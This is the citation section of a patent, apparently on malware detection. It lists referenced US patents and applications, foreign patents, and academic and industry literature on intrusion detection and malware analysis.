9838411 Aziz Dec 2017 B1
9838416 Aziz Dec 2017 B1
9838417 Khalid et al. Dec 2017 B1
9846776 Paithane et al. Dec 2017 B1
9876701 Caldejon et al. Jan 2018 B1
9888016 Amin et al. Feb 2018 B1
9888019 Pidathala et al. Feb 2018 B1
9892261 Joram et al. Feb 2018 B2
9904955 Watters et al. Feb 2018 B2
9910988 Vincent et al. Mar 2018 B1
9912644 Cunningham Mar 2018 B2
9912681 Ismael et al. Mar 2018 B1
9912684 Aziz et al. Mar 2018 B1
9912691 Mesdaq et al. Mar 2018 B2
9912698 Thioux et al. Mar 2018 B1
9916440 Paithane et al. Mar 2018 B1
9921978 Chan et al. Mar 2018 B1
9934376 Ismael Apr 2018 B1
9934381 Kindlund et al. Apr 2018 B1
9946568 Ismael et al. Apr 2018 B1
9954890 Staniford et al. Apr 2018 B1
9973531 Thioux May 2018 B1
10002252 Ismael et al. Jun 2018 B2
10019338 Goradia et al. Jul 2018 B1
10019573 Silberman et al. Jul 2018 B2
10025691 Ismael et al. Jul 2018 B1
10025927 Khalid et al. Jul 2018 B1
10027689 Rathor et al. Jul 2018 B1
10027690 Aziz et al. Jul 2018 B2
10027696 Rivlin et al. Jul 2018 B1
10033747 Paithane et al. Jul 2018 B1
10033748 Cunningham et al. Jul 2018 B1
10033753 Islam et al. Jul 2018 B1
10033759 Kabra et al. Jul 2018 B1
10050998 Singh Aug 2018 B1
10063583 Watters et al. Aug 2018 B2
10068091 Aziz et al. Sep 2018 B1
10075455 Zafar et al. Sep 2018 B2
10083302 Paithane et al. Sep 2018 B1
10084813 Eyada Sep 2018 B2
10089461 Ha et al. Oct 2018 B1
10097573 Aziz Oct 2018 B1
10104102 Neumann Oct 2018 B1
10108446 Steinberg et al. Oct 2018 B1
10121000 Rivlin et al. Nov 2018 B1
10122746 Manni et al. Nov 2018 B1
10133863 Bu et al. Nov 2018 B2
10133866 Kumar et al. Nov 2018 B1
10146810 Shiffer et al. Dec 2018 B2
10148693 Singh et al. Dec 2018 B2
10165000 Aziz et al. Dec 2018 B1
10169585 Pilipenko et al. Jan 2019 B1
10176321 Abbasi et al. Jan 2019 B2
10181029 Ismael et al. Jan 2019 B1
10191861 Steinberg et al. Jan 2019 B1
10192052 Singh et al. Jan 2019 B1
10198574 Thioux et al. Feb 2019 B1
10200384 Mushtaq et al. Feb 2019 B1
10210329 Malik et al. Feb 2019 B1
10216927 Steinberg Feb 2019 B1
10218740 Mesdaq et al. Feb 2019 B1
10242185 Goradia Mar 2019 B1
10282548 Aziz et al. May 2019 B1
10284574 Aziz et al. May 2019 B1
10284575 Paithane et al. May 2019 B2
10296437 Ismael et al. May 2019 B2
10335738 Paithane et al. Jul 2019 B1
10341363 Vincent et al. Jul 2019 B1
10341365 Ha Jul 2019 B1
10366231 Singh et al. Jul 2019 B1
10380343 Jung et al. Aug 2019 B1
10395029 Steinberg Aug 2019 B1
10404725 Rivlin et al. Sep 2019 B1
10417031 Paithane et al. Sep 2019 B2
10430586 Paithane et al. Oct 2019 B1
10432649 Bennett et al. Oct 2019 B1
10445502 Desphande Oct 2019 B1
10447728 Steinberg Oct 2019 B1
10454950 Aziz Oct 2019 B1
10454953 Amin et al. Oct 2019 B1
10462173 Aziz et al. Oct 2019 B1
10467411 Pidathala et al. Nov 2019 B1
10467414 Kindlund et al. Nov 2019 B1
10469512 Ismael Nov 2019 B1
10474813 Ismael Nov 2019 B1
10476906 Siddiqui Nov 2019 B1
10476909 Aziz et al. Nov 2019 B1
10491627 Su Nov 2019 B1
10503904 Singh et al. Dec 2019 B1
10505956 Pidathala et al. Dec 2019 B1
10511614 Aziz Dec 2019 B1
10515214 Vincent et al. Dec 2019 B1
10523609 Subramanian Dec 2019 B1
10528726 Ismael Jan 2020 B1
10534906 Paithane et al. Jan 2020 B1
10552610 Vashisht et al. Feb 2020 B1
10554507 Siddiqui et al. Feb 2020 B1
10565378 Vincent et al. Feb 2020 B1
10567405 Aziz Feb 2020 B1
10572665 Jung et al. Feb 2020 B2
10581874 Khalid et al. Mar 2020 B1
10581879 Paithane et al. Mar 2020 B1
10581898 Singh Mar 2020 B1
10587636 Aziz et al. Mar 2020 B1
10587647 Khalid et al. Mar 2020 B1
10592678 Ismael et al. Mar 2020 B1
10601848 Jeyaraman et al. Mar 2020 B1
10601863 Siddiqui Mar 2020 B1
10601865 Mesdaq et al. Mar 2020 B1
10616266 Otvagin Apr 2020 B1
10621338 Pfoh et al. Apr 2020 B1
10623434 Aziz et al. Apr 2020 B1
10637880 Islam et al. Apr 2020 B1
10642753 Steinberg May 2020 B1
10657251 Malik et al. May 2020 B1
10666686 Singh et al. May 2020 B1
10671721 Otvagin et al. Jun 2020 B1
10671726 Paithane et al. Jun 2020 B1
10701091 Cunningham et al. Jun 2020 B1
10706149 Vincent Jul 2020 B1
10713358 Sikorski et al. Jul 2020 B2
10713362 Vincent et al. Jul 2020 B1
10715542 Wei et al. Jul 2020 B1
10726127 Steinberg Jul 2020 B1
10728263 Neumann Jul 2020 B1
10735458 Haq et al. Aug 2020 B1
10740456 Ismael et al. Aug 2020 B1
10747872 Ha et al. Aug 2020 B1
10757120 Aziz et al. Aug 2020 B1
10757134 Eyada Aug 2020 B1
10785255 Otvagin et al. Sep 2020 B1
10791138 Siddiqui et al. Sep 2020 B1
10795991 Ross et al. Oct 2020 B1
10798112 Siddiqui et al. Oct 2020 B2
10798121 Khalid et al. Oct 2020 B1
10805340 Goradia Oct 2020 B1
10805346 Kumar et al. Oct 2020 B2
10812513 Manni et al. Oct 2020 B1
10817606 Vincent Oct 2020 B1
10826931 Quan et al. Nov 2020 B1
10826933 Ismael et al. Nov 2020 B1
10834107 Paithane et al. Nov 2020 B1
10846117 Steinberg Nov 2020 B1
10848397 Siddiqui et al. Nov 2020 B1
10848521 Thioux et al. Nov 2020 B1
10855700 Jeyaraman et al. Dec 2020 B1
10868818 Rathor et al. Dec 2020 B1
10872151 Kumar et al. Dec 2020 B1
10873597 Mehra et al. Dec 2020 B1
10887328 Paithane et al. Jan 2021 B1
10893059 Aziz et al. Jan 2021 B1
10893068 Khalid et al. Jan 2021 B1
10902117 Singh et al. Jan 2021 B1
10902119 Vashisht et al. Jan 2021 B1
10904286 Liu Jan 2021 B1
10929266 Goradia et al. Feb 2021 B1
20020038430 Edwards et al. Mar 2002 A1
20020091819 Melchione et al. Jul 2002 A1
20020095607 Lin-Hendel Jul 2002 A1
20020169952 DiSanto et al. Nov 2002 A1
20020184528 Shevenell et al. Dec 2002 A1
20020188887 Largman et al. Dec 2002 A1
20030084318 Schertz May 2003 A1
20030188190 Aaron et al. Oct 2003 A1
20030191957 Hypponen et al. Oct 2003 A1
20040015712 Szor Jan 2004 A1
20040019832 Arnold et al. Jan 2004 A1
20040117478 Triulzi et al. Jun 2004 A1
20040117624 Brandt et al. Jun 2004 A1
20040236963 Danford et al. Nov 2004 A1
20040255161 Cavanaugh Dec 2004 A1
20040268147 Wiederin et al. Dec 2004 A1
20050021740 Bar et al. Jan 2005 A1
20050086523 Zimmer et al. Apr 2005 A1
20050091513 Mitomo et al. Apr 2005 A1
20050108562 Khazan et al. May 2005 A1
20050125195 Brendel Jun 2005 A1
20050149726 Joshi et al. Jul 2005 A1
20050157662 Bingham et al. Jul 2005 A1
20050238005 Chen et al. Oct 2005 A1
20050262562 Gassoway Nov 2005 A1
20050283839 Cowburn Dec 2005 A1
20060010495 Cohen et al. Jan 2006 A1
20060015715 Anderson Jan 2006 A1
20060015747 Van de Ven Jan 2006 A1
20060021029 Brickell et al. Jan 2006 A1
20060031476 Mathes et al. Feb 2006 A1
20060070130 Costea et al. Mar 2006 A1
20060117385 Mester et al. Jun 2006 A1
20060123477 Raghavan et al. Jun 2006 A1
20060150249 Gassen et al. Jul 2006 A1
20060161987 Levy-Yurista Jul 2006 A1
20060173992 Weber et al. Aug 2006 A1
20060191010 Benjamin Aug 2006 A1
20060242709 Seinfeld et al. Oct 2006 A1
20060251104 Koga Nov 2006 A1
20060288417 Bookbinder et al. Dec 2006 A1
20070006288 Mayfield et al. Jan 2007 A1
20070006313 Porras et al. Jan 2007 A1
20070011174 Takaragi et al. Jan 2007 A1
20070016951 Piccard et al. Jan 2007 A1
20070064689 Shin et al. Mar 2007 A1
20070143827 Nicodemus et al. Jun 2007 A1
20070157306 Elrod et al. Jul 2007 A1
20070192858 Lum Aug 2007 A1
20070208822 Wang et al. Sep 2007 A1
20070240218 Tuvell et al. Oct 2007 A1
20070240220 Tuvell et al. Oct 2007 A1
20070240222 Tuvell et al. Oct 2007 A1
20070250930 Aziz et al. Oct 2007 A1
20080005782 Aziz Jan 2008 A1
20080040710 Chiriac Feb 2008 A1
20080072326 Danford et al. Mar 2008 A1
20080077793 Tan et al. Mar 2008 A1
20080134334 Kim et al. Jun 2008 A1
20080141376 Clausen et al. Jun 2008 A1
20080184367 McMillan et al. Jul 2008 A1
20080189787 Arnold et al. Aug 2008 A1
20080307524 Singh et al. Dec 2008 A1
20080320594 Jiang Dec 2008 A1
20090003317 Kasralikar et al. Jan 2009 A1
20090064332 Porras et al. Mar 2009 A1
20090083855 Apap et al. Mar 2009 A1
20090125976 Wassermann et al. May 2009 A1
20090126015 Monastyrsky et al. May 2009 A1
20090144823 Lamastra et al. Jun 2009 A1
20090158430 Borders Jun 2009 A1
20090172815 Gu et al. Jul 2009 A1
20090198651 Shiffer et al. Aug 2009 A1
20090198670 Shiffer et al. Aug 2009 A1
20090198689 Frazier et al. Aug 2009 A1
20090199274 Frazier et al. Aug 2009 A1
20090241190 Todd et al. Sep 2009 A1
20090300589 Watters et al. Dec 2009 A1
20100017546 Poo et al. Jan 2010 A1
20100030996 Butler, II Feb 2010 A1
20100058474 Hicks Mar 2010 A1
20100077481 Polyakov et al. Mar 2010 A1
20100115621 Staniford et al. May 2010 A1
20100132038 Zaitsev May 2010 A1
20100154056 Smith et al. Jun 2010 A1
20100192223 Ismael et al. Jul 2010 A1
20100281542 Stolfo et al. Nov 2010 A1
20110078794 Manni et al. Mar 2011 A1
20110093951 Aziz Apr 2011 A1
20110099633 Aziz Apr 2011 A1
20110099635 Silberman et al. Apr 2011 A1
20110167493 Song et al. Jul 2011 A1
20110173213 Frazier et al. Jul 2011 A1
20110178942 Watters et al. Jul 2011 A1
20110219450 McDougal et al. Sep 2011 A1
20110225624 Sawhney et al. Sep 2011 A1
20110247072 Staniford et al. Oct 2011 A1
20110307954 Melnik et al. Dec 2011 A1
20110307955 Kaplan et al. Dec 2011 A1
20110307956 Yermakov et al. Dec 2011 A1
20110314546 Aziz et al. Dec 2011 A1
20120117652 Manni et al. May 2012 A1
20120174186 Aziz et al. Jul 2012 A1
20120174218 McCoy et al. Jul 2012 A1
20120210423 Friedrichs et al. Aug 2012 A1
20120222121 Staniford et al. Aug 2012 A1
20120233698 Watters et al. Sep 2012 A1
20120278886 Luna Nov 2012 A1
20120331553 Aziz et al. Dec 2012 A1
20130036472 Aziz Feb 2013 A1
20130047257 Aziz Feb 2013 A1
20130097706 Titonis et al. Apr 2013 A1
20130185795 Winn et al. Jul 2013 A1
20130227691 Aziz et al. Aug 2013 A1
20130232577 Watters et al. Sep 2013 A1
20130247186 LeMasters Sep 2013 A1
20130282426 Watters et al. Oct 2013 A1
20130291109 Staniford et al. Oct 2013 A1
20130318038 Shiffer et al. Nov 2013 A1
20130318073 Shiffer et al. Nov 2013 A1
20130325791 Shiffer et al. Dec 2013 A1
20130325792 Shiffer et al. Dec 2013 A1
20130325871 Shiffer et al. Dec 2013 A1
20130325872 Shiffer et al. Dec 2013 A1
20140032875 Butler Jan 2014 A1
20140181131 Ross Jun 2014 A1
20140189687 Jung et al. Jul 2014 A1
20140189866 Shiffer et al. Jul 2014 A1
20140189882 Jung et al. Jul 2014 A1
20140237600 Silberman et al. Aug 2014 A1
20140280245 Wilson Sep 2014 A1
20140283037 Sikorski et al. Sep 2014 A1
20140283063 Thompson et al. Sep 2014 A1
20140297494 Watters et al. Oct 2014 A1
20140337836 Ismael Nov 2014 A1
20140344926 Cunningham et al. Nov 2014 A1
20140380473 Bu et al. Dec 2014 A1
20140380474 Paithane et al. Dec 2014 A1
20150007312 Pidathala et al. Jan 2015 A1
20150096022 Vincent et al. Apr 2015 A1
20150096023 Mesdaq et al. Apr 2015 A1
20150096024 Haq et al. Apr 2015 A1
20150096025 Ismael Apr 2015 A1
20150180886 Staniford et al. Jun 2015 A1
20150186645 Aziz et al. Jul 2015 A1
20150199513 Ismael et al. Jul 2015 A1
20150199531 Ismael et al. Jul 2015 A1
20150199532 Ismael et al. Jul 2015 A1
20150220735 Paithane et al. Aug 2015 A1
20150372980 Eyada Dec 2015 A1
20160004869 Ismael et al. Jan 2016 A1
20160006756 Ismael et al. Jan 2016 A1
20160044000 Cunningham Feb 2016 A1
20160127393 Aziz et al. May 2016 A1
20160191547 Zafar et al. Jun 2016 A1
20160191550 Ismael et al. Jun 2016 A1
20160241580 Watters et al. Aug 2016 A1
20160241581 Watters et al. Aug 2016 A1
20160261612 Mesdaq et al. Sep 2016 A1
20160285914 Singh et al. Sep 2016 A1
20160301703 Aziz Oct 2016 A1
20160323295 Joram et al. Nov 2016 A1
20160335110 Paithane et al. Nov 2016 A1
20170083703 Abbasi et al. Mar 2017 A1
20180013770 Ismael Jan 2018 A1
20180048660 Paithane et al. Feb 2018 A1
20180069891 Watters et al. Mar 2018 A1
20180097787 Murthy Apr 2018 A1
20180097788 Murthy Apr 2018 A1
20180097789 Murthy Apr 2018 A1
20180121316 Ismael et al. May 2018 A1
20180288077 Siddiqui et al. Oct 2018 A1
20190104154 Kumar et al. Apr 2019 A1
20190132334 Johns et al. May 2019 A1
20190207966 Vashisht et al. Jul 2019 A1
20190207967 Vashisht et al. Jul 2019 A1
20200252428 Gardezi et al. Aug 2020 A1
Foreign Referenced Citations (11)
Number Date Country
2439806 Jan 2008 GB
2490431 Oct 2012 GB
0206928 Jan 2002 WO
0223805 Mar 2002 WO
2007117636 Oct 2007 WO
2008041950 Apr 2008 WO
2011084431 Jul 2011 WO
2011112348 Sep 2011 WO
2012075336 Jun 2012 WO
2012145066 Oct 2012 WO
2013067505 May 2013 WO
Non-Patent Literature Citations (57)
Entry
Venezia, Paul, “NetDetector Captures Intrusions”, InfoWorld Issue 27, (“Venezia”), (Jul. 14, 2003).
Vladimir Getov: “Security as a Service in Smart Clouds—Opportunities and Concerns”, Computer Software and Applications Conference (COMPSAC), 2012 IEEE 36th Annual, IEEE, Jul. 16, 2012 (Jul. 16, 2012).
Wahid et al., Characterising the Evolution in Scanning Activity of Suspicious Hosts, Oct. 2009, Third International Conference on Network and System Security, pp. 344-350.
Whyte, et al., “DNS-Based Detection of Scanning Works in an Enterprise Network”, Proceedings of the 12th Annual Network and Distributed System Security Symposium, (Feb. 2005), 15 pages.
Williamson, Matthew M., “Throttling Viruses: Restricting Propagation to Defeat Malicious Mobile Code”, ACSAC Conference, Las Vegas, NV, USA, (Dec. 2002), pp. 1-9.
Yuhei Kawakoya et al: “Memory behavior-based automatic malware unpacking in stealth debugging environment”, Malicious and Unwanted Software (Malware), 2010 5th International Conference on, IEEE, Piscataway, NJ, USA, Oct. 19, 2010, pp. 39-46, XP031833827, ISBN:978-1-4244-8-9353-1.
Zhang et al., The Effects of Threading, Infection Time, and Multiple-Attacker Collaboration on Malware Propagation, Sep. 2009, IEEE 28th International Symposium on Reliable Distributed Systems, pp. 73-82.
“Mining Specification of Malicious Behavior”—Jha et al, UCSB, Sep. 2007 https://www.cs.ucsb.edu/~chris/research/doc/esec07_mining.pdf.
“Network Security: NetDetector—Network Intrusion Forensic System (NIFS) Whitepaper”, (“NetDetector Whitepaper”), (2003).
“When Virtual is Better Than Real”, IEEEXplore Digital Library, available at http://ieeexplore.ieee.org/xpl/articleDetails.jsp?reload=true&arnumber=990073, (Dec. 7, 2013).
Abdullah, et al., Visualizing Network Data for Intrusion Detection, 2005 IEEE Workshop on Information Assurance and Security, pp. 100-108.
Adetoye, Adedayo , et al., “Network Intrusion Detection & Response System”, (“Adetoye”), (Sep. 2003).
Apostolopoulos, George; Hassapis, Constantinos; “V-eM: A cluster of Virtual Machines for Robust, Detailed, and High-Performance Network Emulation”, 14th IEEE International Symposium on Modeling, Analysis, and Simulation of Computer and Telecommunication Systems, Sep. 11-14, 2006, pp. 117-126.
Aura, Tuomas, “Scanning electronic documents for personally identifiable information”, Proceedings of the 5th ACM workshop on Privacy in electronic society. ACM, 2006.
Baecher, “The Nepenthes Platform: An Efficient Approach to collect Malware”, Springer-verlag Berlin Heidelberg, (2006), pp. 165-184.
Bayer, et al., “Dynamic Analysis of Malicious Code”, J Comput Virol, Springer-Verlag, France., (2006), pp. 67-77.
Boubalos, Chris , “extracting syslog data out of raw pcap dumps, seclists.org, Honeypots mailing list archives”, available at http://seclists.org/honeypots/2003/q2/319 (“Boubalos”), (Jun. 5, 2003).
Chaudet, C. , et al., “Optimal Positioning of Active and Passive Monitoring Devices”, International Conference on Emerging Networking Experiments and Technologies, Proceedings of the 2005 ACM Conference on Emerging Network Experiment and Technology, CoNEXT '05, Toulousse, France, (Oct. 2005), pp. 71-82.
Chen, P. M. and Noble, B. D., “When Virtual is Better Than Real, Department of Electrical Engineering and Computer Science”, University of Michigan (“Chen”) (2001).
Cisco “Intrusion Prevention for the Cisco ASA 5500-x Series” Data Sheet (2012).
Cohen, M.I., “PyFlag—An advanced network forensic framework”, Digital Investigation 5, Elsevier, (2008), pp. S112-S120.
Costa, M., et al., “Vigilante: End-to-End Containment of Internet Worms”, SOSP '05, Association for Computing Machinery, Inc., Brighton U.K., (Oct. 23-26, 2005).
Didier Stevens, “Malicious PDF Documents Explained”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 9, No. 1, Jan. 1, 2011, pp. 80-82, XP011329453, SSN: 1540-7993, DOI: 10.1109/MSP.2011.14.
Distler, “Malware Analysis: An Introduction”, SANS Institute InfoSec Reading Room, SANS Institute, (2007).
Dunlap, George W. , et al., “ReVirt: Enabling Intrusion Analysis through Virtual-Machine Logging and Replay”, Proceeding of the 5th Symposium on Operating Systems Design and Implementation, USENIX Association, (“Dunlap”), (Dec. 9, 2002).
FireEye Malware Analysis & Exchange Network, Malware Protection System, FireEye Inc., 2010.
FireEye Malware Analysis, Modern Malware Forensics, FireEye Inc., 2010.
FireEye v.6.0 Security Target, pp. 1-35, Version 1.1, FireEye Inc., May 2011.
Goel, et al., Reconstructing System State for Intrusion Analysis, Apr. 2008 SIGOPS Operating Systems Review, vol. 42 Issue 3, pp. 21-28.
Gregg Keizer: “Microsoft's HoneyMonkeys Show Patching Windows Works”, Aug. 8, 2005, XP055143386, Retrieved from the Internet: URL:http://www.informationweek.com/microsofts-honeymonkeys-show-patching-windows-works/d/d-id/1035069? [retrieved on Jun. 1, 2016].
Heng Yin et al, Panorama: Capturing System-Wide Information Flow for Malware Detection and Analysis, Research Showcase @ CMU, Carnegie Mellon University, 2007.
Hiroshi Shinotsuka, Malware Authors Using New Techniques to Evade Automated Threat Analysis Systems, Oct. 26, 2012, http://www.symantec.com/connect/blogs/, pp. 1-4.
Idika et al., A-Survey-of-Malware-Detection-Techniques, Feb. 2, 2007, Department of Computer Science, Purdue University.
Isohara, Takamasa, Keisuke Takemori, and Ayumu Kubota. “Kernel-based behavior analysis for android malware detection.” Computational intelligence and Security (CIS), 2011 Seventh International Conference on. IEEE, 2011.
Kaeo, Merike , “Designing Network Security”, (“Kaeo”), (Nov. 2003).
Kevin A Roundy et al: “Hybrid Analysis and Control of Malware”, Sep. 15, 2010, Recent Advances in Intrusion Detection, Springer Berlin Heidelberg, Berlin, Heidelberg, pp. 317-338, XP019150454 ISBN:978-3-642-15511-6.
Khaled Salah et al: “Using Cloud Computing to Implement a Security Overlay Network”, Security & Privacy, IEEE, IEEE Service Center, Los Alamitos, CA, US, vol. 11, No. 1, Jan. 1, 2013 (Jan. 1, 2013).
Kim, H. , et al., “Autograph: Toward Automated, Distributed Worm Signature Detection”, Proceedings of the 13th Usenix Security Symposium (Security 2004), San Diego, (Aug. 2004), pp. 271-286.
King, Samuel T., et al., “Operating System Support for Virtual Machines”, (“King”), (2003).
Kreibich, C. , et al., “Honeycomb-Creating Intrusion Detection Signatures Using Honeypots”, 2nd Workshop on Hot Topics in Networks (HotNets-11), Boston, USA, (2003).
Kristoff, J. , “Botnets, Detection and Mitigation: DNS-Based Techniques”, NU Security Day, (2005), 23 pages.
Lastline Labs, The Threat of Evasive Malware, Feb. 25, 2013, Lastline Labs, pp. 1-8.
Li et al., A VMM-Based System Call Interposition Framework for Program Monitoring, Dec. 2010, IEEE 16th International Conference on Parallel and Distributed Systems, pp. 706-711.
Lindorfer, Martina, Clemens Kolbitsch, and Paolo Milani Comparetti. “Detecting environment-sensitive malware.” Recent Advances in Intrusion Detection. Springer Berlin Heidelberg, 2011.
Marchette, David J., “Computer Intrusion Detection and Network Monitoring: A Statistical Viewpoint”, (“Marchette”), (2001).
Moore, D. , et al., “Internet Quarantine: Requirements for Containing Self-Propagating Code”, INFOCOM, vol. 3, (Mar. 30-Apr. 3, 2003), pp. 1901-1910.
Morales, Jose A., et al., “Analyzing and exploiting network behaviors of malware”, Security and Privacy in Communication Networks. Springer Berlin Heidelberg, 2010. 20-34.
Mori, Detecting Unknown Computer Viruses, 2004, Springer-Verlag Berlin Heidelberg.
Natvig, Kurt, “SANDBOXII: Internet”, Virus Bulletin Conference, (“Natvig”), (Sep. 2002).
NetBIOS Working Group. Protocol Standard for a NetBIOS Service on a TCP/UDP transport: Concepts and Methods. STD 19, RFC 1001, Mar. 1987.
Newsome, J. , et al., “Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software”, In Proceedings of the 12th Annual Network and Distributed System Security, Symposium (NDSS '05), (Feb. 2005).
Nojiri, D. , et al., “Cooperation Response Strategies for Large Scale Attack Mitigation”, DARPA Information Survivability Conference and Exposition, vol. 1, (Apr. 22-24, 2003), pp. 293-302.
Oberheide et al., CloudAV: N-Version Antivirus in the Network Cloud, 17th USENIX Security Symposium, USENIX Security '08, Jul. 28-Aug. 1, 2008, San Jose, CA.
Reiner Sailer, Enriquillo Valdez, Trent Jaeger, Ronald Perez, Leendert van Doorn, John Linwood Griffin, Stefan Berger, sHype: Secure Hypervisor Approach to Trusted Virtualized Systems (Feb. 2, 2005) (“Sailer”).
Silicon Defense, “Worm Containment in the Internal Network”, (Mar. 2003), pp. 1-25.
Singh, S. , et al., “Automated Worm Fingerprinting”, Proceedings of the ACM/USENIX Symposium on Operating System Design and Implementation, San Francisco, California, (Dec. 2004).
Thomas H. Ptacek, and Timothy N. Newsham , “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”, Secure Networks, (“Ptacek”), (Jan. 1998).
Provisional Applications (1)
Number Date Country
62826875 Mar 2019 US